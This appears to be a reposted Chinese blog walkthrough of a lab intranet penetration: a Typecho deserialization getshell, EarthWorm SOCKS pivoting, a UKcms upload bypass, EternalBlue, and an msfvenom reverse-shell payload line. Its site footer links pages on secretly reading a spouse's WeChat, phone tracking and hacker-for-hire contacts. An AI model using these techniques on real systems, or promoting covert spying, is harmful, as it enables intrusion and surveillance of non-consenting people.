内网渗透 | 手把手教你如何进行内网渗透

访客4年前黑客文章782

  文章目录结构

  

  

  首页

  看到DMZ开启了web服务,是一个typecho的cms,后台默认就是/admin

  

  后台

  尝试爆破

  

  弱口令admin1234

  但是找了一圈并没有发现有什么可以利用的,网上有一个反序列化的洞可以用。

  

  exp

  

  上面呢,就是利用exp将一句话写入当前目录的shellx.php中。

  

  get shell

  到这里呢,想了想我们的目标是内网,并且防火墙没开,就不考虑提权了。

  现在的目标是将此DMZ服务器当作跳板并探测内网的服务器。

  采用ew套接字 *** ,服务器上运行准备好的ew_for_linux64,本地使用proxifier配置如下:

  

  

   *** 规则配置如上,可以根据情况具体配置,以上是Windows端的配置,但是渗透难免会用到kali,所以kali也需要配置:

  

  首先修改一下/etc/proxychains.conf,如下图所示:

  

  

  修改完成后保存,然后就可以proxychains nmap等等。

  至此,跳板配置基本完成。

  还有一种 *** 是利用msf生成马儿让目标运行,反弹回来meterpreter查看路由添加路由,然后msf就可以访问内网,可以使用msf来探测以及渗透测试。

  这里首先有几种 *** 。

  之一种,ifconfig,适用于双网卡的情况:

  

  但是可以看到,并没有我们需要的信息。

  第二种查看路由以及arp:

  

  路由

  上图是查看路由,还可以利用arp -a查看一下arp的信息,以及可以利用traceroute xxx.com查看一下路由走的路径。

  但是看到也没有我们想要的信息,到这里我是很迷茫了,找不到内网另一个ip段,我就去问了一下环境的搭建者,他也不知道怎么找,索性就把ip段告诉了我,此处留个疑问,希望有想法的大佬联系我。

  既然知道了ip段,就需要探测一下到底哪些主机我们可以渗透:

  

  nmap

  利用proxychain nmap达到nmap使用 *** 扫描的效果,这里需要注意的是socket *** 不支持ICMP协议,所以nmap的参数应设置如上图所示,端口可以自己改。

  可以看到10.10.1.1以及10.10.1.2的80端口都开着,那我就proxychains3 firefox打开火狐访问了一下,之一个是路由器的管理,第二个是一个cms。到这里呢,可以去猜一下路由的密码,我是直接去看了cms,因为kali中渗透web有点麻烦,所以就利用上面配置好的proxifier *** 在Windows下进行渗透。

  

  UKcms

  

  后台

  后台默认路径/admin.php,使用了默认账号密码admin 123456

  这个cms呢,后台可以getshell,我是被卡在burpsuite抓包上面,开了burpsuite总是无法访问,后来才发现,在burpsuite里面设置了socks *** 就没必要再开proxifier了。burp配置如下:

  

  之一种 ***

  

  第二种 ***

  如上配置后,就不需要再开socks *** 工具了,否则会出现问题。

  

  在后台添加php允许上传,再去上传点,不要传php因为判断了Content-Type。

  

  传图片抓包改成php

  会看到上传成功的提醒,关于路径有以下 *** :

  

  

  成功getshell,这是一种 *** ,比较麻烦。

  前期内网探测时发现了这是台windows服务器,并且存在MS17_010漏洞,可以proxychains3 msfconsole利用msf直接打。

  因为这是第二层内网,所以要连接webshell需要打开proxifier然后用AntSword进行连接。

  

  

  双网卡

  如上图我们知道了第三层ip段为4.4.1.x,看一下arp表:

  

  这种基本猜测下个目标就是4.4.1.2了,但还是需要nmap探测一下,在此之前,先配置 *** 链。

  还是使用earthworm进行socks *** ,服务端运行后,本机配置如下:

  

  windows

  

  kali

  配置完成后,用nmap探测一下

  

  可以看到开了135、445、3389,啥都不说了,永恒之蓝打一波。

  

  

  这里需要注意,payload要选择正向连接的,不要反弹shell,因为我们访问得到目标而目标访问不到我们。

  

  得到一个meterpreter shell。

  

  read password

  这样我们拿到了admin的密码,直接远程连接:

  

  3389

  至此呢,本次内网渗透就完成了。

  拿到DMZ的shell或权限后,可以使用ew建立socks *** ,我们的windows用proxifier,我们的linux用proxychains连接,即可访问内网。如果是多层,那么proxifier提供 *** 链,proxychains也可以多层 *** 。

  windows下若需要burpsuite进行配合,就关掉proxifier,使用burpsuite配置socks *** ,其他步骤和平常使用burp一样即可。

  Linux下若使用burpsuite与上面同理,不要使用proxychains即可。

  Linux下还可以通过msf进行内网探测以及攻击:

  

  步骤

  

  payload

  msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.106 LPORT=1234 -f exe -o payload.exe

  反弹payload配置,正向配置rhost以及rport即可。

  针对双网卡的目标:

  

  ipconfig或ifconfig

  

  arp

  若是路由的话,可以先看一下路由,或按照上面msf的情况:

  

  route

  若是没有有效信息,可以考虑社工。

  关于nmap:

  

  因为ss不支持ICMP协议,所以要加如上参数,若需要其他功能则直接加就行。

  本次DMZ开启了web服务是linux服务器,第二层开了web服务是windows服务器,第三层windows服务器。

  渗透过程中,首先要明确目标开了什么服务,什么操作系统等等,我们才知道如何下手。

  本次渗透没有涉及域渗透,只是简单说明一下渗透流程。

  

  原创投稿作者:Railgun

  作者博客:www.pwn4fun.com

相关文章

有没有免费恢复微信聊天记录的软件「有钱男人为什么喜欢生儿子」

有没有免费恢复微信聊天记录的软件「有钱男人为什么喜欢生儿子」

  有没有免费的微信聊天记录恢复软件!微信是每天都要用到的社交工具,也在生活中占据重要地位,当中数据对我们来说很重要,特别是微信聊天记录,有些是我们舍不得删除的记录的!经常会在很多操作中误删聊天记录,...

怎样登陆闺蜜微信不被发现呢

  外地蟹运阳澄湖洗澡后涨价三倍   日前,一则“外地蟹运阳澄湖洗澡后涨价三倍”的消息在网上引发关注。据了解,大闸蟹销售旺季,外地蟹运往阳澄湖过水“洗澡”现象却屡禁不绝,行业协会还专门研发了防伪蟹扣...

怎么查看老公和别人微信聊天记录

《锦衣之下》是很多人都在追的一部剧,而在昨晚的剧情中明明相爱的两人,陆绎选择了和今夏分手,虐了不少观众的心,网友纷纷表示求复合,那么,锦衣之下陆绎今夏复合是第几集?锦衣之下陆绎今夏为什么分手?下面友谊...

苏轼江城子密州出猎(苏轼最有名的诗词)

  公米1074年,39岁的苏东坡,正值壮年,在杭州任职期满,自请调至密州。密州,即山东诸城。此地自古是一个名不见经传的小城市,直到苏轼的到来。伴随着苏东坡那些脍炙人口的诗词,密州从而名扬天下。其中《...

10元一次手机定位 10元定位手机位置

现在是互联网时代,我相信像我这样的年轻人,在这个伟大的时代,想要通过手机或互联网实现更多的服务,让我们的生活更加便捷。"如今,智能手机时代已经到来。可以说,几乎每个人手里都有一部智能手机。 现在我们并...

黑客QQ-黑客QQ(黑客qq联系方式)业务等相关信息

黑客QQ-黑客QQ(黑客qq联系方式)业务等相关信息

黑客QQ相关问题 黑客qq联系方式相关问题 尼尔机械纪元怎么黑客入侵 物流信息部怎么运营(圆通物流信息部) 如何确认手机里有黑客 远程查看对象微信聊天(如何远程查看别人微信...